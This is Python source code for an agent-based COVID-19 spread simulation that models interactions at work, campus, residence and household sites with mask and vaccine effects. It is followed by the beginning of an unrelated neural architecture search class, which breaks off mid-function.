Designed to replicate the student residences on campus. They are only visited by first year students.
stud_house_sites : :obj:`np.array` of :obj:`list` of :obj:`int`
Visited by every student each day, and hosts interactions between members
of the same household. Infection spread at home is not defined by explicit contacts,
but by a known spread factor.
"""
    def __init__(self, sim_obj):
        """Build every interaction site list and reset the daily counters.

        Parameters
        ----------
        sim_obj : :obj:`cv19.simulation.simulation`
            The encompassing simulation object hosting the simulation.
        """
        # Set attributes from config file
        self.load_attributes_from_sim_obj(sim_obj)
        # Per-day interaction counters, one np.zeros(nDays) array per site code.
        self.daily_interactions = {"HOUSE_GENERAL": np.zeros(self.nDays),
                                   "HOUSE_STUDENT": np.zeros(self.nDays)}
        # Generates a list of people that go to different grade X sites
        # len(grade_X_sites) is how many sites there are; len(grade_X_sites[i]) is how many people go to that site
        self.grade_A_sites = self.init_grade(grade_code="A")
        self.grade_B_sites = self.init_grade(grade_code="B")
        self.grade_C_sites = self.init_grade(grade_code="C")
        # Household membership: deep copies so later mutation here cannot
        # affect the population's own lists.
        self.house_sites = deepcopy(self.pop.household)
        self.house_indices = deepcopy(self.pop.house_ppl_i)
        # Students Stuff #
        self.stud_house_sites = deepcopy(self.pop.stud_houses)
        self.stud_house_indices = deepcopy(self.pop.house_stud_i)
        self.lect_sites = self.init_uni(grade_code="LECT")
        self.study_sites = self.init_uni(grade_code="STUDY")
        self.food_sites = self.init_uni(grade_code="FOOD")
        self.res_sites = self.init_res(grade_code="RES")
        # Running count of infections caused today (reset by daily_reset()).
        self.daily_new_infections = 0
def load_attributes_from_sim_obj(self, sim_obj):
"""Method to load in attributes from the provided simulation class object.
Sets all objects in the "interaction_sites_data" dictionary key as self
attributes of the InteractionSites class.
Parameters
----------
sim_obj : :obj:`cv19.simulation.simulation`
The encompassing simulation obejct hosting the simulation.
"""
attributes = sim_obj.parameters["interaction_sites_data"].keys()
for attr in attributes:
setattr(self, attr, sim_obj.parameters["interaction_sites_data"][attr])
# Get the disease parameters
d_attributes = sim_obj.disease_parameters["spread_data"].keys()
for attr in d_attributes:
setattr(self, attr, sim_obj.disease_parameters["spread_data"][attr])
# Get the virus type names
self.variant_codes = sim_obj.variant_codes
self.variant_code_map = {v_id: v_name for v_name, v_id in self.variant_codes.items()} # virus ids
# Set the actual objects now
self.pop = sim_obj.pop
self.policy = sim_obj.policy
self.nDays = sim_obj.parameters["simulation_data"]["nDays"]
    def init_grade(self, grade_code):
        """Method designed to associate members of the population with interaction sites.

        This method initializes all non-student interaction sites by creating a list
        of person indices for each interaction site of this grade.

        Parameters
        ----------
        grade_code : str
            Code used to index the values to create this type of site from the config file.

        Returns
        -------
        grade_sites : :obj:`list` of :obj:`np.array` of :obj:`int`
            One array per interaction site of this type. Each nested
            array holds the index of people that are associated with that site (can visit it).
        """
        # Mean/std of how many distinct sites of this grade one person frequents.
        loyalty_mean = self.grade_loyalty_means[grade_code]
        loyalty_std = self.grade_loyalty_stds[grade_code]
        # Whether students also attend this grade of site (config flag).
        students_interact = self.students_participate[grade_code]
        # Calculate number of sites
        num_sites = self.calculate_num_sites(grade_code=grade_code)
        grade_sites = [[] for _ in range(num_sites)]
        for person in self.pop.get_population():
            if students_interact or not (self.students_on and person.job == 'Student'):
                # if students are meant to go to this site
                # Assign people to this specific site
                # abs(round(normal)) can be 0: that person visits no site of this grade.
                num_diff_sites = abs(round(np.random.normal(loyalty_mean, loyalty_std)))
                num_diff_sites = num_diff_sites if num_diff_sites <= num_sites else num_sites
                # Get a list of len num_diff_sites for this person to be associated with now
                person_sites = np.random.choice(num_sites, num_diff_sites, replace=False)
                for site in person_sites:
                    # Assign this person to that site
                    grade_sites[site].append(person.get_index())
        # Convert everything to numpy arrays
        grade_sites = [np.asarray(site) for site in grade_sites]
        # Initialize the number of interactions dictionary
        self.daily_interactions[grade_code] = np.zeros(self.nDays)
        return grade_sites
    def init_uni(self, grade_code):
        """Method designed to associate members of the student population with interaction sites.

        This method initializes all student interaction sites by creating a list
        of person indices for each interaction site of this grade.  Only people
        whose job attribute is 'Student' are assigned.

        Parameters
        ----------
        grade_code : str
            Code used to index the values to create this type of site from the config file.

        Returns
        -------
        grade_sites : :obj:`list` of :obj:`np.array` of :obj:`int`
            One array per interaction site of this type. Each nested
            array holds the index of students that are associated with that site (can visit it).
        """
        # Mean/std of how many distinct sites of this grade one student frequents.
        loyalty_mean = self.grade_loyalty_means[grade_code]
        loyalty_std = self.grade_loyalty_stds[grade_code]
        # Calculate number of sites
        num_sites = self.calculate_num_sites(grade_code=grade_code)
        grade_sites = [[] for _ in range(num_sites)]
        for student in self.pop.get_population():
            if student.job == 'Student':
                # Assign people to this specific site
                # abs(round(normal)) can be 0: that student visits no site of this grade.
                num_diff_sites = abs(round(np.random.normal(loyalty_mean, loyalty_std)))
                num_diff_sites = num_diff_sites if num_diff_sites <= num_sites else num_sites
                # Get a list of len num_diff_sites for this person to be associated with now
                student_sites = np.random.choice(num_sites, num_diff_sites, replace=False)
                for site in student_sites:
                    # Assign this person to that site
                    grade_sites[site].append(student.get_index())
        # Convert everything to numpy arrays
        grade_sites = [np.asarray(site) for site in grade_sites]
        # Initialize the number of interactions dictionary
        self.daily_interactions[grade_code] = np.zeros(self.nDays)
        return grade_sites
    def init_res(self, grade_code):
        """Method designed to associate students with the residence interaction site.

        This method initializes the residence interaction sites by creating a list
        of person indices for each interaction site.  Assignment iterates over the
        residence rooms and the students indexed under each room.

        Parameters
        ----------
        grade_code : str
            Code used to index the values to create this type of site from the config file.

        Returns
        -------
        grade_sites : :obj:`list` of :obj:`np.array` of :obj:`int`
            One array per interaction site of this type. Each nested
            array holds the index of people that are associated with that site (can visit it).
        """
        # Mean/std of how many distinct residence sites one student frequents.
        loyalty_mean = self.grade_loyalty_means[grade_code]
        loyalty_std = self.grade_loyalty_stds[grade_code]
        # Calculate number of sites
        num_sites = self.calculate_num_sites(grade_code=grade_code)
        grade_sites = [[] for _ in range(num_sites)]
        for room in self.pop.get_residences():
            for student_i in self.stud_house_indices[room]:
                # Assign people to this specific site
                # abs(round(normal)) can be 0: that student visits no residence site.
                num_diff_sites = abs(round(np.random.normal(loyalty_mean, loyalty_std)))
                num_diff_sites = num_diff_sites if num_diff_sites <= num_sites else num_sites
                # Get a list of len num_diff_sites for this person to be associated with now
                student_sites = np.random.choice(num_sites, num_diff_sites, replace=False)
                for site in student_sites:
                    # Assign this person to that site
                    grade_sites[site].append(student_i)
        # Convert everything to numpy arrays
        grade_sites = [np.asarray(site) for site in grade_sites]
        # Initialize the number of interactions dictionary
        self.daily_interactions[grade_code] = np.zeros(self.nDays)
        return grade_sites
    def daily_reset(self):
        """Method used to reset the interaction sites at the end of each day.

        This function is currently used to clean up dead agents from interaction sites,
        and to reset daily counts (such as the daily infection count).

        Parameters
        ----------
        None

        Returns
        -------
        None
        """
        # Drop dead agents from every site list, then zero today's counter.
        self.remove_dead()
        self.daily_new_infections = 0
def calculate_num_sites(self, grade_code):
"""Method used to calculate the number of sites for an interaction site grade.
Parameters
----------
grade_code : str
Code used to index the values to create this type of site from the config file.
Returns
-------
num_sites : int
The number of sites to be used for that interaction site grade.
"""
if grade_code in self.site_num and self.site_num[grade_code] == 0:
# Raise a warning
warnings.warn(f"Site type '{grade_code}' size set to 0. No interaction sites of this type created.")
return 0
else:
return self.site_num[grade_code] if grade_code in self.site_num else \
max(round(self.pop.get_population_size() / self.site_size[grade_code]), 1)
def remove_dead(self):
"""Method to remove dead agents from interaction site arrays.
Iterates through each type of site array, and will remove all agents that are
dead from each array.
Parameters
----------
None
Returns
-------
None
"""
# Create list of all dead agents
dead_agents = self.pop.get_dead()
# Site type A
for i, site_array in enumerate(self.grade_A_sites):
# Mask where True indicates alive and False indicates dead (note the invert argument)
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.grade_A_sites[i] = site_array[mask_alive]
# Site type B
for i, site_array in enumerate(self.grade_B_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.grade_B_sites[i] = site_array[mask_alive]
# Site type C
for i, site_array in enumerate(self.grade_C_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.grade_C_sites[i] = site_array[mask_alive]
# Site type lecture
for i, site_array in enumerate(self.lect_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.lect_sites[i] = site_array[mask_alive]
# Site type study
for i, site_array in enumerate(self.study_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.study_sites[i] = site_array[mask_alive]
# Site type food
for i, site_array in enumerate(self.food_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.food_sites[i] = site_array[mask_alive]
# Site type res
for i, site_array in enumerate(self.res_sites):
mask_alive = np.isin(site_array, dead_agents, invert=True)
self.res_sites[i] = site_array[mask_alive]
    def will_visit_site(self, site_array, will_go_prob):
        """Method to determine who will visit a site on a given day.

        Generates, for each individual interaction site in site_array, the list
        of people that will visit that site today.  Accounts for quarantined
        people by replacing their attendance probability with
        self.quarantine_isolation_factor.  Each attending person is assigned to
        exactly one of the sites they are associated with, chosen uniformly at
        random among their sites.

        Parameters
        ----------
        site_array : :obj:`np.array` of :obj:`np.array` of :obj:`int`
            An array holding lists (one for each interaction site) of the index of each person
            associated with each of the individual sites.
        will_go_prob : float
            The probability that any given person in site_array will visit this type of site.

        Returns
        -------
        will_visit_grade : :obj:`list` of :obj:`np.array` of :obj:`int`
            One array per site of this interaction site type, holding the
            indexes of people that will visit that site on this day.
        """
        # Figure out who is going to go to this site type today.
        person_ids = np.unique(np.concatenate(site_array))
        # Create array of attendance probabilities (quarantined people use the
        # reduced isolation factor instead of will_go_prob).
        prob_attendence = [self.quarantine_isolation_factor
                           if self.pop.get_person(person).is_quarantined() else will_go_prob
                           for person in person_ids]
        # Select a subset of people who will actually choose to go to the site.
        person_will_go_mask = np.random.binomial(1, p=prob_attendence).astype(bool)
        person_ids = person_ids[person_will_go_mask]
        # Create a Boolean array of people (rows) and sites (columns).
        # Each entry corresponds to whether or not
        # a given person can go to the given site.
        person_site_array = np.zeros(shape=(person_ids.shape[0], len(site_array)), dtype=bool)
        for s, site in enumerate(site_array):
            mask = np.isin(person_ids, site)
            person_site_array[mask, s] = True
        # Choose a random number for each person,
        # with an upper bound as the number of available sites for that person.
        # NOTE: high >= 1 for everyone here, because person_ids was built from
        # the site membership lists, so each person belongs to at least one site.
        high = person_site_array.sum(axis=-1)
        random_site_index = np.random.randint(low=0, high=high)
        # argsort the array (descending) along sites and use random number above to select
        # one of the available sites (first sites up to high[i] are available for person i).
        site_indexes_argsorted = np.argsort(person_site_array, axis=-1)[..., ::-1]
        person_site_index = site_indexes_argsorted[np.arange(site_indexes_argsorted.shape[0]),
                                                   random_site_index]
        will_visit_grade = [person_ids[np.where(person_site_index == s)[0]]
                            for s in range(len(site_array))]
        return will_visit_grade
    def site_interaction(self, will_go_array, day, personal, grade_code):
        """Method that hosts interactions between people for an interaction site type.

        This method manages interactions between people going to the same interaction
        site this day.  All people that visit the same site on a day have a
        chance to interact with each other.  Does not provide a return value; all
        infections are managed within the function (applied at the end of the day).

        Parameters
        ----------
        will_go_array : :obj:`np.array` of :obj:`np.array` of :obj:`int`
            An array holding an array for each site of this interaction site type. Each individual list
            holds the indexes of people that will visit that site for this day.
        day : int
            The day value that this function is being called on in the encompassing simulation class.
            Used as input to the infect function after infections have been determined.
        personal : bool
            Used to indicate if the type of interaction at this site is personal, which relates to
            contact tracing abilities.
        grade_code : str
            Code used to index this site type in the daily interaction counters.
        """
        # Pending infections, applied only after all sites are processed.
        new_infections = np.zeros(self.pop.get_population_size(), dtype=bool)
        new_infection_type = np.zeros(self.pop.get_population_size(), dtype=int)
        total_interactions_count = 0
        for ppl_going in will_go_array:
            infected_persons = [index for index in ppl_going if self.pop.get_person(index).is_infected()]
            recovered_persons = [index for index in ppl_going if self.pop.get_person(index).is_recovered()]
            # Generate a list of how many interactions ppl have at the site
            num_interactions = self.calc_interactions(site_day_pop=len(ppl_going))
            # Each interaction involves two people, hence the halving.
            total_interactions_count += np.sum(num_interactions) // 2
            # NOTE(review): skipping here means contacts at sites where spread is
            # impossible are never logged for tracing -- confirm that is intended.
            if len(infected_persons) == 0 or (len(infected_persons) + len(recovered_persons) == len(ppl_going)):
                continue # No ppl to infect here or no one already infected
            # Pair people until at most one person has interactions left.
            while np.sum(num_interactions > 0) > 1:
                # grab the highest interactor
                person_1 = np.argmax(num_interactions)
                # find a random interactor for them to pair with (that is not them)
                person_2 = np.random.randint(num_interactions.shape[0])
                while person_2 == person_1 or num_interactions[person_2] <= 0:
                    person_2 = np.random.randint(num_interactions.shape[0])
                # Get the actual people at these indexes
                person_1_index = ppl_going[person_1]
                person_2_index = ppl_going[person_2]
                # Getting the Person objects and logging the contacts
                p1_obj = self.pop.get_person(person_1_index)
                p2_obj = self.pop.get_person(person_2_index)
                p1_obj.log_contact(p2_obj, day=day, personal=personal)
                p2_obj.log_contact(p1_obj, day=day, personal=personal)
                # Check to make sure one is infected
                person_1_infected = p1_obj.is_infected()
                person_2_infected = p2_obj.is_infected()
                if person_1_infected != person_2_infected:
                    # Have an interaction between those people
                    did_infect = self.interact(p1_obj, p2_obj)
                    if did_infect:
                        if person_1_infected:
                            new_infections[person_2_index] = True
                            new_infection_type[person_2_index] = self.pop.get_person(person_1_index).get_virus_type()
                        else:
                            new_infections[person_1_index] = True
                            new_infection_type[person_1_index] = self.pop.get_person(person_2_index).get_virus_type()
                # Lower the interaction count for those people
                num_interactions[person_1] -= 1
                num_interactions[person_2] -= 1
        # Update people who get infected only at the end. Assuming if I get CV19 at work, I probably won't spread at the store that night.
        new_infection_indexes = np.where(new_infections)[0]
        self.daily_new_infections += len(new_infection_indexes)
        for new_infection in new_infection_indexes:
            self.pop.infect(index=new_infection, virus_type=new_infection_type[new_infection], day=day)
        # Update total daily interactions count
        self.daily_interactions[grade_code][day] = total_interactions_count
def calc_interactions(self, site_day_pop):
"""Method to determine how many interactions a person will have.
Note
----
Currently the distribution for the number of interactions a given person will have is
a "triangular" distribution with only one side (a linear distribution). The distribution
output spans from 0 to site_day_pop/day_hours_scaler, where it is much more likely to have 0
interactions than the max. day_hours_scaler takes into account that people will not all be
at the interaction site at the same time, but will be dispersed throughout the 12 hour day.
As it stands, day_hours_scaler is not a config file parameter, as the hours in the day should not be
adjusted between simulations. If the need is felt for an adjustable scaling factor, a new (second)
variable should be introduced.
Parameters
----------
site_day_pop : `int`
The total number of people at that specific interaction site this day.
Returns
-------
number_of_interactions : :obj:`np.array` of :obj:`int`
The number of interactions all people will have within this interaction site.
"""
day_hours_scaler = 12
if site_day_pop == 0:
return np.array([])
else:
# Generate a linaer distribution from
number_of_interactions = np.round(np.random.triangular(left=0, mode=0, right=site_day_pop / day_hours_scaler,
size=site_day_pop)).astype(int)
return number_of_interactions
def interact(self, person_1, person_2):
"""Method that models the interaction between two people.
Parameters
----------
person_1 : :obj:`cv19.person.Person`
First person in the two-way interaction.
person_2 : :obj:`cv19.person.Person`
Second person in the two-way interaction.
Returns
-------
: :obj:`bool`
Whether or not the interaction caused the spread of the infection.
"""
p1_infected = person_1.is_infected()
p2_infected = person_2.is_infected()
virus_type = person_1.get_virus_type() if p1_infected else person_2.get_virus_type()
spread_prob = self.base_infection_spread_prob[self.variant_code_map[virus_type]]
if self.policy.get_mask_mandate():
p1_mask = person_1.wear_mask()
p2_mask = person_2.wear_mask()
P1_INWARD_EFF, P1_OUTWARD_EFF = person_1.mask_type_efficiency()
P2_INWARD_EFF, P2_OUTWARD_EFF = person_2.mask_type_efficiency()
if p1_infected:
if p1_mask:
spread_prob *= (1 - P1_OUTWARD_EFF)
if p2_mask:
spread_prob *= (1 - P2_INWARD_EFF)
elif p2_infected:
if p1_mask:
spread_prob *= (1 - P1_INWARD_EFF)
if p2_mask:
spread_prob *= (1 - P2_OUTWARD_EFF)
p1_vaccinated1 = person_1.is_vaccinated()
p2_vaccinated1 = person_2.is_vaccinated()
p1_vaccine_eff = person_1.vaccine_type_efficiency() if p1_vaccinated1 else 0
p2_vaccine_eff = person_2.vaccine_type_efficiency() if p2_vaccinated1 else 0
spread_prob *= ((1 - p1_vaccine_eff) * (1 - p2_vaccine_eff))
return random() < spread_prob
    def house_interact(self, day):
        """Method to manage interactions between members of the same household.
        Determines if any infection will spread among members of the same household. Different
        from interaction sites in the fact that contacts are not calculated, but assumed to happen
        between all house members. Does not have a return value, infections are managed internally.

        NOTE(review): near-duplicate of student_house_interact (only the index
        list and the daily_interactions key differ); consider a shared helper.
        Parameters
        ----------
        day : int
            The day value that this function is being called on in the encompassing simulation class.
            Used as input to the infect function after infections have been determined.
        """
        total_house_interactions = 0
        for house_indices in self.house_indices:
            # Get people in house
            house_size = len(house_indices)
            housemembers = [self.pop.get_population()[ind] for ind in house_indices]
            virus_types = [person.get_virus_type() for person in housemembers]
            # Every pair of housemates is assumed to interact: C(n, 2) contacts.
            total_house_interactions += comb(len(housemembers), 2)
            # Do interactions between the housemates
            for member1, member2 in combinations(housemembers, 2):
                member1.log_contact(member2, day=day, personal=True)
                member2.log_contact(member1, day=day, personal=True)
            # Check if anyone in the house is infected
            if any(housemembers[i].is_infected() for i in range(house_size)):
                infected_housemembers = [i for i in range(house_size) if housemembers[i].is_infected()]
                # Keep only the virus types carried by the infected members.
                virus_types = [virus_types[i] for i in infected_housemembers]
                healthy_housemembers = [i for i in range(house_size) if not housemembers[i].is_infected()]
                for person in healthy_housemembers:
                    # Each healthy member is exposed to one randomly chosen variant.
                    virus_id = np.random.choice(a=virus_types)
                    virus_name = self.variant_code_map[virus_id]
                    # Household spread is the base probability scaled by the house factor.
                    infection_chance = self.base_infection_spread_prob[virus_name] * self.house_infection_spread_factor
                    person_vaccinated = housemembers[person].is_vaccinated()
                    person_vaccine_eff = housemembers[person].vaccine_type_efficiency() if person_vaccinated else 0
                    infection_chance *= (1 - person_vaccine_eff)
                    caught_infection = random() < infection_chance
                    if caught_infection:
                        # NOTE(review): the counter is bumped before the virus_id
                        # sanity check below — confirm that ordering is intended.
                        self.daily_new_infections += 1
                        if virus_id is None:
                            raise ValueError("House infection has incorrect virus type.")
                        self.pop.infect(index=housemembers[person].get_index(), day=day, virus_type=virus_id)
        self.daily_interactions["HOUSE_GENERAL"][day] = total_house_interactions
    def student_house_interact(self, day):
        """Method to manage interactions between members of the same student household.
        Determines if any infection will spread among members of the same household. Different
        from interaction sites in the fact that contacts are not calculated, but assumed to happen
        between all house members. Does not have a return value, infections are managed internally.

        NOTE(review): near-duplicate of house_interact (only stud_house_indices
        and the "HOUSE_STUDENT" key differ); consider a shared helper.
        Parameters
        ----------
        day : int
            The day value that this function is being called on in the encompassing simulation class.
            Used as input to the infect function after infections have been determined.
        """
        total_house_interactions = 0
        for house_indices in self.stud_house_indices:
            # Get people in house
            house_size = len(house_indices)
            housemembers = [self.pop.get_population()[ind] for ind in house_indices]
            virus_types = [person.get_virus_type() for person in housemembers]
            # Every pair of housemates is assumed to interact: C(n, 2) contacts.
            total_house_interactions += comb(len(housemembers), 2)
            # Do interactions between the housemates
            for member1, member2 in combinations(housemembers, 2):
                member1.log_contact(member2, day=day, personal=True)
                member2.log_contact(member1, day=day, personal=True)
            # Check if anyone in the house is infected
            if any(housemembers[i].is_infected() for i in range(house_size)):
                infected_housemembers = [i for i in range(house_size) if housemembers[i].is_infected()]
                # Keep only the virus types carried by the infected members.
                virus_types = [virus_types[i] for i in infected_housemembers]
                healthy_housemembers = [i for i in range(house_size) if not housemembers[i].is_infected()]
                for person in healthy_housemembers:
                    # Each healthy member is exposed to one randomly chosen variant.
                    virus_id = np.random.choice(a=virus_types)
                    virus_name = self.variant_code_map[virus_id]
                    infection_chance = self.base_infection_spread_prob[virus_name] * self.house_infection_spread_factor
                    person_vaccinated = housemembers[person].is_vaccinated()
                    person_vaccine_eff = housemembers[person].vaccine_type_efficiency() if person_vaccinated else 0
                    infection_chance *= (1 - person_vaccine_eff)
                    caught_infection = random() < infection_chance
                    if caught_infection:
                        self.daily_new_infections += 1
                        if virus_id is None:
                            raise ValueError("House infection has incorrect virus type.")
                        self.pop.infect(index=housemembers[person].get_index(), day=day, virus_type=virus_id)
        self.daily_interactions["HOUSE_STUDENT"][day] = total_house_interactions
    def testing_site(self, tests_per_day, day):
        """Method to update status of symptoms and run the testing sites code.

        Delegates entirely to the population object; the order matters —
        symptom states must be refreshed before tests are handed out.
        Parameters
        ----------
        tests_per_day : int
            The max number of available tests for this given day.
        day : int
            The day value that this function is being called on in the encompassing simulation class.
        """
        self.pop.update_uninfected_symptomatics()
        self.pop.update_infected_symptomatics(day)
        self.pop.get_tested(tests_per_day, day)
def get_grade_A_sites(self):
"""Method to return a copy of the grade_A_sites attribute.
Returns
-------
self.grade_A_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.grade_A_sites)
def get_grade_B_sites(self):
"""Method to return a copy of the grade_B_sites attribute.
Returns
-------
self.grade_B_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.grade_B_sites)
def get_grade_C_sites(self):
"""Method to return a copy of the grade_C_sites attribute.
Returns
-------
self.grade_C_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.grade_C_sites)
def get_lect_sites(self):
"""Method to return a copy of the lect_sites attribute.
Returns
-------
self.lect_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.lect_sites)
def get_study_sites(self):
"""Method to return a copy of the study_sites attribute.
Returns
-------
self.study_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.study_sites)
def get_food_sites(self):
"""Method to return a copy of the food_sites attribute.
Returns
-------
self.food_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.food_sites)
def get_res_sites(self):
"""Method to return a copy of the res_sites attribute.
Returns
-------
self.res_sites.copy() : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
"""
return deepcopy(self.res_sites)
| Queens-Physics/quaboom | cv19/interaction_sites.py | interaction_sites.py | py | 33,973 | python | en | code | 4 | github-code | 36 |
7755009879 | import numpy as np
import json
import copy
import functools
from tensorpack.utils import logger
from petridish.info.layer_info import LayerInfo, LayerInfoList, LayerTypes
class CellNetworkInfo(dict):
    """Dict-backed description of a cell-structured network.

    Holds up to three :class:`LayerInfoList` values under the keys
    'master', 'normal' and 'reduction'.  A macro-search network stores
    only 'master'; a cell-based search stores 'normal' and optionally
    'reduction'.
    """
    def __init__(self, master=None, normal=None, reduction=None):
        # NOTE(review): locals() also contains 'self' at this point, so the
        # dict gains a 'self' key besides the three cell keys — confirm
        # this is intended before changing.
        super(CellNetworkInfo, self).__init__(locals())
        self._cell_names = []
        if master is not None:
            self._cell_names.append('master')
        if normal is not None:
            self._cell_names.append('normal')
        if reduction is not None:
            self._cell_names.append('reduction')
    @property
    def master(self):
        # Macro (whole-network) layer list, or None for cell-based nets.
        return self.get('master', None)
    @master.setter
    def master(self, val):
        self['master'] = val
    @property
    def normal(self):
        # Normal-cell layer list, or None for macro nets.
        return self.get('normal', None)
    @normal.setter
    def normal(self, val):
        self['normal'] = val
    @property
    def reduction(self):
        # Reduction-cell layer list, or None if absent.
        return self.get('reduction', None)
    @reduction.setter
    def reduction(self, val):
        self['reduction'] = val
    @property
    def cell_names(self):
        # Names recorded at construction time (order: master, normal, reduction).
        return self._cell_names
    @property
    def operable_cell_names(self):
        # Cells that search operations may modify: master only, or the
        # normal (and reduction) cells when they exist.
        if self.normal is None:
            return ['master']
        elif self.reduction is None:
            return ['normal']
        return ['normal', 'reduction']
    def is_cell_based(self):
        # True when the network is described by normal/reduction cells.
        return 'normal' in self.operable_cell_names
    def to_str(self):
        # JSON-serialize only the cells named at construction time.
        return json.dumps({key : self[key] for key in self._cell_names})
    def sample_hallucinations(
            self, layer_ops, merge_ops, prob_at_layer=None,
            min_num_hallus=1, hallu_input_choice=None):
        """Sample candidate (hallucinated) layers for each operable cell.

        Returns a dict mapping cell name to the sampled hallucinations.
        Sum-merged cells use the sum-sampling path, others the cat path.
        """
        hallus = dict()
        num_hallu_by_name = dict()
        if len(self.operable_cell_names) > 1:
            assert len(self.operable_cell_names) == 2, \
                self.operable_cell_names
            num_hallu_by_name['normal'] = min_num_hallus
            num_hallu_by_name['reduction'] = min_num_hallus
        else:
            num_hallu_by_name[self.operable_cell_names[0]] = min_num_hallus
        for cname in self.operable_cell_names:
            n_hallus = num_hallu_by_name[cname]
            if n_hallus == 0:
                continue
            if cname == 'master' or self[cname].is_end_merge_sum():
                cell_based = (cname != 'master')
                hallus[cname] = self[cname].sample_sum_hallucinations(layer_ops,
                    merge_ops, prob_at_layer, n_hallus, hallu_input_choice, cell_based)
            else:
                hallus[cname] = self[cname].sample_cat_hallucinations(layer_ops,
                    merge_ops, prob_at_layer, n_hallus, hallu_input_choice)
        return hallus
    def add_hallucinations(self, hallus,
            final_merge_op=LayerTypes.MERGE_WITH_SUM,
            stop_gradient_val=1,
            hallu_gate_layer=LayerTypes.NO_FORWARD_LAYER):
        """Insert previously sampled hallucinations into each named cell."""
        for cname in hallus:
            args = [hallus[cname], final_merge_op, stop_gradient_val, hallu_gate_layer]
            if cname == 'master' or self[cname].is_end_merge_sum():
                self[cname].add_sum_hallucinations(*args)
            else:
                self[cname].add_cat_hallucinations(*args)
        return self
    def contained_hallucination(self):
        """Map (cell_index, hallu_id) -> (start, end) location in that cell."""
        hallu_locs = dict()
        for ci, cname in enumerate(self.operable_cell_names):
            # candidate id to (start, end)
            hid_to_range = self[cname].contained_hallucination()
            for hid in hid_to_range:
                hallu_locs[(ci, hid)] = hid_to_range[hid]
        return hallu_locs
    def sorted_hallu_indices(self, hallu_locs):
        # sort by ci, then location in list
        return sorted(hallu_locs, key=lambda ci_hid : (ci_hid[0], hallu_locs[ci_hid][0]))
    def separate_hallu_info_by_cname(self, contained, hallu_indices, l_fs_ops, l_fs_omega):
        """
        Args:
        contained : a dict from (ci, hid) to (start, end) in self[operable_cnames[ci]]
        hallu_indices : list of (ci, hid), in order by sorted_hallu_indices
        l_fs_ops : list of list of int indices that represent the order of importance of
            input op of the hallu feature selection. The first level list is in the
            same order as hallu_indices (sorted by (ci,hid) ). These indices are the
            ones that are chosen by each hallu.
        l_fs_omega : list of list of float value that represent the importance value
            whose abosolute value is in decreasing value. The first level is the in
            the same order as l_op_indices and hallu_indices
            These value are associated with the chosen operations.
        """
        cell_names = self.operable_cell_names
        # first break the info by cname so that we can call cell/layerInfoList level api.
        # dictionary from hid to location (start, end)
        lil_contained = { cname : dict() for cname in cell_names }
        for ci_hid in contained:
            ci, hid = ci_hid
            cname = cell_names[ci]
            lil_contained[cname][hid] = contained[ci_hid]
        # hid in sorted order for each cname
        lil_h_indices = { cname : [] for cname in cell_names }
        for ci_hid in hallu_indices:
            ci, hid = ci_hid
            cname = cell_names[ci]
            lil_h_indices[cname].append(hid)
        # Feature selection info
        if l_fs_ops is None or len(l_fs_ops) == 0:
            lil_fs_ops = { cname : None for cname in cell_names }
            lil_fs_omega = { cname : None for cname in cell_names }
        else:
            lil_fs_ops = { cname : [] for cname in cell_names }
            lil_fs_omega = { cname : [] for cname in cell_names }
            for ci_hid, fs_ops, fs_omega in zip(hallu_indices, l_fs_ops, l_fs_omega):
                ci, hid = ci_hid
                cname = cell_names[ci]
                lil_fs_ops[cname].append(fs_ops)
                lil_fs_omega[cname].append(fs_omega)
        return (lil_contained, lil_h_indices, lil_fs_ops, lil_fs_omega)
    def select_hallucination(self, selected, separated_hallu_info):
        """
        selected : list of (ci, hid)
        """
        cell_names = self.operable_cell_names
        # selected hid for each cname
        lil_selected = { cname : [] for cname in cell_names }
        for ci_hid in selected:
            ci, hid = ci_hid
            cname = cell_names[ci]
            lil_selected[cname].append(hid)
        (lil_contained, lil_h_indices, lil_fs_ops, lil_fs_omega) = separated_hallu_info
        # Invoke LayerInfoList select
        for cname in cell_names:
            lil_args = [lil_selected[cname], lil_contained[cname],
                lil_h_indices[cname], lil_fs_ops[cname], lil_fs_omega[cname]
            ]
            if cname == 'master' or self[cname].is_end_merge_sum():
                self[cname] = self[cname].select_sum_hallucination(*lil_args)
            else:
                self[cname] = self[cname].select_cat_hallucination(*lil_args)
        return self
    @staticmethod
    def calc_reduction_layers(num_cells, num_reduction_layers, num_init_reductions):
        """
        Compute true_cell_idx of reduction layers
        """
        reduction_layers = list(range(num_init_reductions))
        for pool_num in range(1, num_reduction_layers + 1):
            # Reductions are spread evenly across the num_cells normal cells.
            layer_num = (float(pool_num) / (num_reduction_layers + 1)) * num_cells
            layer_num = int(layer_num) + pool_num - 1 + num_init_reductions
            reduction_layers.append(layer_num)
        return reduction_layers
    @staticmethod
    def default_master(n_normal_inputs=2, n_reduction_inputs=2,
            num_cells=18, num_reduction_layers=2, num_init_reductions=0,
            skip_reduction_layer_input=0, use_aux_head=1):
        """Build the default macro layer list of normal/reduction cells."""
        reduction_layers = CellNetworkInfo.calc_reduction_layers(
            num_cells, num_reduction_layers, num_init_reductions)
        master = LayerInfoList()
        layer_id = 0
        n_inputs = n_normal_inputs if num_init_reductions == 0 else n_reduction_inputs
        for _ in range(n_inputs):
            master.append(LayerInfo(layer_id=layer_id))
            layer_id += 1
        # true_num_cells counts cells from the first non-input with 0-based index
        true_num_cells = num_cells + num_init_reductions + num_reduction_layers
        for ci in range(true_num_cells):
            info = LayerInfo(layer_id)
            if ci in reduction_layers:
                info.inputs = list(range(layer_id - n_reduction_inputs, layer_id))
                n_in = len(info.inputs)
